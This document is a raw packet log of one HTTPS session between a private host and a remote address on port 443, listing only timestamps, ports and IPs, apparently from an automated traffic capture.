Apr 24, 2024 07:32:45.885900974 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.885921001 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.885931015 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.885972023 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.887851954 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.887916088 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.887926102 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.887940884 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.887994051 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.889889956 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.889960051 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.889961004 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.889991999 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.890029907 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.892482042 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.892546892 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.892549992 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.892580986 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.892626047 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.895078897 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.895145893 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.895149946 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.895175934 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.895220995 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.897083044 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.897150040 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.897187948 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.897196054 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.897207975 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.899808884 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.899878025 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.899878979 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.899905920 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.899955034 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.901731014 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.901796103 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.901804924 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.901818991 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.901856899 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.904320955 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.904391050 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.904397011 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.904414892 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.904460907 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.906294107 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.906357050 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.906368017 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.906378984 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.906423092 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.908945084 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.909015894 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.909035921 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.909044981 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.909084082 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.910903931 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.910967112 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.910973072 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.910990953 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.911035061 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.930588007 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.930682898 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.930690050 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.930716038 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.930754900 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.932493925 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.932563066 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.932566881 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.932595968 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.932632923 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.934360981 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.934428930 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.934437990 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.934473991 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.934523106 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.936161995 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.936234951 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.936239958 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.936261892 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.936299086 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.938257933 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.938323021 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.938328981 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.938358068 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.938400984 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.940172911 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.940237045 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.940241098 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.940262079 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.940304995 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.941922903 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.941998005 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.942008018 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.942032099 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.942075968 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.944324970 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.944390059 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.944399118 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.944422960 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.944463968 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.946301937 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.946371078 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.946377993 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.946403027 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.946446896 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.947849035 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.947911024 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.947913885 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.947935104 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.947978020 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.949824095 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.949892998 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.949898005 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.949927092 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.949973106 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.952188969 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.952260971 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.952282906 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.952291012 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.952320099 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.954308033 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.954379082 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.954382896 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.954412937 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.954458952 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.955931902 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.955997944 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.956006050 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.956021070 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.956059933 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.958148003 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.958223104 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.958235979 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.958271027 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.958295107 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.959961891 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.960026979 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.960030079 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.960057020 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.960107088 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.961846113 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.961911917 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.961920023 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.961944103 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.961990118 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.964025974 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.964091063 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.964114904 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.964138031 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.964219093 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.966125011 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.966196060 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.966213942 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.966237068 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.966269970 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.967822075 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.967890024 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.967899084 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.967914104 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.967952967 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.970170975 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.970242977 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.970243931 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.970269918 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.970360041 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.972043991 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.972135067 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.972157955 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.972181082 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.972208977 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.973681927 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.973753929 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.973754883 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.973784924 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.973820925 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.975712061 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.975774050 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.975802898 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.975814104 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.975831985 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.977955103 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.978038073 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.978101015 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.978133917 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.978180885 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.979739904 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.979808092 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.979836941 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.979845047 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.979856968 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.981578112 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.981647968 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.981656075 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.981677055 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.981728077 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.983397961 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.983467102 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.983483076 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.983490944 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.983525991 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.985795975 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.985873938 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.985901117 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.985908985 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.986088037 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.986814022 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.986875057 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.986881971 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.986910105 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.986962080 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.990168095 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.990245104 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.990266085 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.990272999 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.990308046 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.991410017 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.991478920 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.991488934 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.991519928 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.991569996 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.993153095 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.993221998 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.993227959 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.993280888 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.993782043 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.993786097 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.993843079 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.995678902 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.995743990 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.995757103 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.995764971 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.995810032 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.996869087 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.997183084 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.997251034 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.997251987 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.997273922 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.997312069 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.997410059 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.999314070 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.999382019 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.999417067 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.999423981 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:45.999461889 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:45.999536991 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.001586914 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.001655102 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.001665115 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.001686096 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.001724958 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.003509045 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.003580093 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.003592968 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.003616095 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.003657103 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.005054951 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.005122900 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.005132914 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.005146980 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.005187988 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.006907940 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.006978989 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.007088900 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.007102966 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.007127047 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.009068012 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.009134054 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.009135008 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.009159088 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.009208918 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.010893106 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.010962009 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.010967970 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.010992050 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.011040926 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.012563944 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.012593031 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.012634039 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.012641907 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.012653112 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.012689114 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.014532089 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.014573097 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.014617920 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.014625072 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.014682055 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.016710997 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.016746998 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.016798973 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.016807079 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.016844988 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.018306971 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.018342018 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.018418074 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.018424988 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.018454075 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.020081997 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.020117998 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.020157099 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.020167112 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.020179033 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.021812916 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.021847010 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.021882057 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.021889925 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.021909952 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.023845911 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.023876905 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.023919106 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.023927927 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.023947001 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.025360107 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.025392056 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.025434971 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.025444031 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.025468111 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.027225018 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.027256012 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.027292013 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.027298927 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.027347088 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.028728008 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.028760910 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.028796911 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.028805017 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.028827906 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.030947924 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.030977011 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.031014919 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.031023026 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.031038046 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.032361031 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.032396078 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.032433987 CEST	49165	443	192.168.2.22	172.67.215.45
